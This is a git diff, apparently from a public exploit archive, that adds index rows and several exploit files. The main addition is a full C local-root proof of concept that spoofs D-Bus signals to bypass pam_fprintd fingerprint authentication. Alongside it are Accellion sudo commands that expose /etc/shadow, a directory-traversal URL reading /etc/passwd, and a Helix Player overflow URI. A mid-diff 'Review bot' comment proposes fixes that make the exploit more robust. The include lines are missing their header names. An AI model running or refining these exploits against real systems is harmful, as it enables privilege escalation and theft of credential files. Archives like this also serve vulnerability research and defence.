diff --git a/files.csv b/files.csv
index 53923dd90..4f17aa67f 100755
--- a/files.csv
+++ b/files.csv
@@ -30282,3 +30282,16 @@ id,file,description,date,author,platform,type,port
 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0
 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server v5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80
 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0
+33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80
+33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Local Root Exploit",2014-06-02,"Sebastian Krahmer",linux,local,0
+33615,platforms/multiple/remote/33615.txt,"JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability",2010-02-08,apoc,multiple,remote,0
+33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 Space String Remote File Disclosure Vulnerability",2010-02-08,"Pouya Daneshmand",multiple,remote,0
+33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 'index.php' SQL Injection Vulnerability",2010-02-08,alnjm33,php,webapps,0
+33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 Multiple SQL Injection Vulnerabilities",2010-02-08,"cr4wl3r ",php,webapps,0
+33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 'login.php' Cross Site Scripting Vulnerability",2010-02-08,vr,php,webapps,0
+33620,platforms/linux/remote/33620.txt,"Helix Player <= 11.0.2 Encoded URI Processing Buffer Overflow Vulnerability",2007-07-03,gwright,linux,remote,0
+33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component 'viewpage.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0
+33622,platforms/linux/remote/33622.txt,"Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0
+33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
+33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
+33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0
diff --git a/platforms/linux/local/33614.c b/platforms/linux/local/33614.c
new file mode 100755
index 000000000..5382dc378
--- /dev/null
+++ b/platforms/linux/local/33614.c
@@ -0,0 +1,161 @@ +/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role. + * + * (C) 2013 Sebastian Krahmer, all rights reversed. + * + * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and + * registers DBUS signal inside the PAM authentication function: + * + * dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL); + * dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL); + * dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result), + * data, NULL); + * + * Then, when the DBUS signal arrives, the signal argument is basically just checked + * to be the "verify-match" string; which however is expected to come from the legit + * net.reactivated.Fprint service. Since there is no message filter registered in either + * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed + * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal + * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our + * sender-name (which cannot be spoofed) inside its hash tables and match it to + * net.reactivated.Fprint. + * + * To test this PoC, start a service (su is fine) as user that is using pam_fprintd. + * On a second xterm, when you see 'Swipe your ... finger' message start this PoC + * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p + * + * Used various DBUS tutorials and example code, while writing this. 
+ * + * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall + * + */ + +#include +#include +#include +#include +#include +#include + + +void die(const char *s) +{ + perror(s); + exit(errno); +} + + +int main(int argc, char **argv) +{ + DBusError err; + DBusConnection *conn = NULL; + DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL; + dbus_uint32_t serial = 0; + dbus_bool_t t = 1; + int un = 0, i = 0, reply_to = -1; + const char *vrfy_match = "verify-match", *cname = NULL, + *name = "net.reactivated.Fprint", *prev_owner = NULL; + char dest[32]; + + /* override unique name of net.reactivated.Fprint */ + if (argc > 1) + prev_owner = strdup(argv[1]); + + printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n"); + + printf("[*] Initializing DBUS ...\n"); + dbus_error_init(&err); + conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err); + + if (dbus_error_is_set(&err)) { + fprintf(stderr, "Error: %s\n", err.message); + die("dbus_error_is_set"); + } + + if ((cname = dbus_bus_get_unique_name(conn)) == NULL) + die("dbus_bus_get_unique_name"); + + un = atoi(strchr(cname, '.') + 1); + + printf("[+] Done. 
Found my unique name: %s (%d)\n", cname, un); + + if (!prev_owner) { + printf("[*] Trying to find unique name of '%s' ...\n", name); + nl_msg = dbus_message_new_method_call("org.freedesktop.DBus", + "/org/freedesktop/DBus", + "org.freedesktop.DBus", + "GetNameOwner"); + + if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID)) + die("[-] dbus_message_append_args"); + + reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err); + dbus_message_unref(nl_msg); + + if (dbus_error_is_set(&err)) { + fprintf (stderr, "[-] Error: %s\n", err.message); + die("[-] dbus_connection_send_with_reply_and_block"); + } + + if (!dbus_message_get_args(reply, &err, + DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) { + fprintf(stderr, "[-] Error: %s\n", err.message); + die("[-] dbus_message_get_args"); + } + + dbus_message_unref(reply); + } + + printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner); + + for (i = 1; i < 20; ++i) { + /* spoof a NameOwnerChanged signal */ + noc_msg = dbus_message_new_signal("/org/freedesktop/DBus", + "org.freedesktop.DBus", + "NameOwnerChanged"); + + /* spoof a VerifyStatus */ + vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0", + "net.reactivated.Fprint.Device", + "VerifyStatus"); + + if (!vrfy_msg || !noc_msg) + die("[-] dbus_message_new_signal"); + + if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING, + &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID)) + die("[-] dbus_message_append_args1"); + + if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match, + DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID)) + die("[-] dbus_message_append_args2"); + + /* iterate over unique names short below under our own + * to hit the previously started su + */ + snprintf(dest, sizeof(dest), ":1.%d", un - i); + printf("[*] Using new destination: %s\n", dest); + + if (!dbus_message_set_destination(vrfy_msg, dest)) + die("[-] 
dbus_message_set_destination"); + + if (!dbus_message_set_destination(noc_msg, dest)) + die("[-] dbus_message_set_destination"); + + if (!dbus_connection_send(conn, noc_msg, &serial)) + die("[-] dbus_connection_send"); + + dbus_connection_flush(conn); + usleep(1000); + + if (!dbus_connection_send(conn, vrfy_msg, &serial)) + die("[-] dbus_connection_send"); + + dbus_connection_flush(conn); + + dbus_message_unref(vrfy_msg); + dbus_message_unref(noc_msg); + } + + printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n"); + return 0; +} \ No newline at end of file diff --git a/platforms/linux/local/33623.txt b/platforms/linux/local/33623.txt new file mode 100755 index 000000000..1f8701474 --- /dev/null +++ b/platforms/linux/local/33623.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/38176/info + +Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: + +- Multiple privilege-escalation issues +- A directory-traversal issue +- An HTML-injection issue +- A remote command-injection issue + +An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible. + +The following proofs of concept are available: + +sh-2.05b$ ln /etc/shadow /home/admin/oldtemp +sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp + +sh-2.05b$ ln /etc/shadow /home/admin/temp +sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf + +sh-2.05b$ sudo /usr/local/bin/admin.pl diff --git a/platforms/linux/remote/33620.txt b/platforms/linux/remote/33620.txt new file mode 100755 index 000000000..b149ab703 --- /dev/null +++ b/platforms/linux/remote/33620.txt 
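Review bot: The six `+#include` lines at the top of the new file 33614.c carry no header names, so the file as committed cannot compile; the angle-bracketed names (presumably `<dbus/dbus.h>` plus the libc headers behind `printf`, `strdup`, `usleep` and `errno`, given the `pkg-config --cflags dbus-1` build line in the header comment) look like they were lost in extraction and should be restored. `die()` ends with `exit(errno)`, which returns exit status 0 when the failing call was a D-Bus error rather than a libc error (the `dbus_error_is_set` paths may leave `errno` untouched), so `exit(EXIT_FAILURE);` is the reliable form. `un = atoi(strchr(cname, '.') + 1);` dereferences the NULL result of `strchr` if the unique name contains no `'.'`, and `atoi` gives no error indication; a `strtol` with an end-pointer check, guarded by `if (!p) die("strchr");`, would be the defensive form. On the defending side, the header comment already names the root cause, namely that `VerifyStatus` is accepted without checking that the signal's sender matches the current owner of `net.reactivated.Fprint`, so the mitigation belongs in pam_fprintd or dbus-glib (a sender check or message filter), not in this file.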
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/38161/info + +Helix Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +Successful exploits may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. + + +The following example URI is available: + +http://AAA.BBB.CCC.DDD:EEEE/%.20000000s% + diff --git a/platforms/linux/remote/33622.txt b/platforms/linux/remote/33622.txt new file mode 100755 index 000000000..2fdf8db16 --- /dev/null +++ b/platforms/linux/remote/33622.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/38176/info + +Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: + +- Multiple privilege-escalation issues +- A directory-traversal issue +- An HTML-injection issue +- A remote command-injection issue + +An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible. + +https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/multiple/remote/33615.txt b/platforms/multiple/remote/33615.txt new file mode 100755 index 000000000..6818d8ccf --- /dev/null +++ b/platforms/multiple/remote/33615.txt @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/38143/info + +JDownloader is prone to a vulnerability that lets remote attackers execute arbitrary code. + +Attackers can exploit this issue to execute arbitrary code within the context of the affected webserver process. + +Versions prior to JDownloader 0.9.334 are vulnerable. + +
+